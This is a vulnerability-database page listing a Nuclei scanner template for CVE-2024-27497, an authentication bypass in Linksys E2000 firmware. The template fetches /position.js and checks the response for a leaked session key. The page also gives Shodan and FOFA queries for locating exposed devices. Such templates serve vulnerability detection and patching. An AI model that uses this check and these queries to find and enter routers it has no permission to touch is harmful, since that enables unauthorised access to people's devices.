Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-27497
HistoryMar 05, 2024 - 3:30 a.m.

Linksys E2000 1.0.06 position.js Improper Authentication

2024-03-0503:30:07
ProjectDiscovery
github.com
6
linksys
e2000
authenticationbypass
cve-2024-27497
improperauthentication

6.6 Medium

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

21.6%

Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.
id: CVE-2024-27497

info:
  name: Linksys E2000 1.0.06 position.js Improper Authentication
  author: DhiyaneshDk
  severity: high
  description: |
    Linksys E2000 Ver.1.0.06 build 1 is vulnerable to authentication bypass via the position.js file.
  impact: |
    Successful exploitation could lead to unauthorized access to the device.
  remediation: |
    Upgrade to a patched version of the firmware to mitigate the vulnerability.
  reference:
    - https://warp-desk-89d.notion.site/Linksys-E-2000-efcd532d8dcf4710a4af13fca131a5b8
    - https://nvd.nist.gov/vuln/detail/CVE-2024-27497
    - https://github.com/Ostorlab/KEV
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    epss-score: 0.00053
    epss-percentile: 0.21091
  metadata:
    verified: true
    max-request: 1
    shodan-query: product:"Linksys E2000 WAP http config"
    fofa-query: app="LINKSYS-E2000"
  tags: cve,cve2024,linksys,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/position.js"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "var session_key"
          - "close_session"
          - "HELPPATH"
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100bc45a3642ab4b42420d1363596d33f08fb8092e527d7bafbe36f1d860115fe6b022100bf43e1c1bd2ccdaa945c05099e77a2b9b4c3a24f6ecafba7aecfbaed81b6e3e6:922c64590222798bb761d5b6d8e72950

6.6 Medium

AI Score

Confidence

Low

0.001 Low

EPSS

Percentile

21.6%

Related for NUCLEI:CVE-2024-27497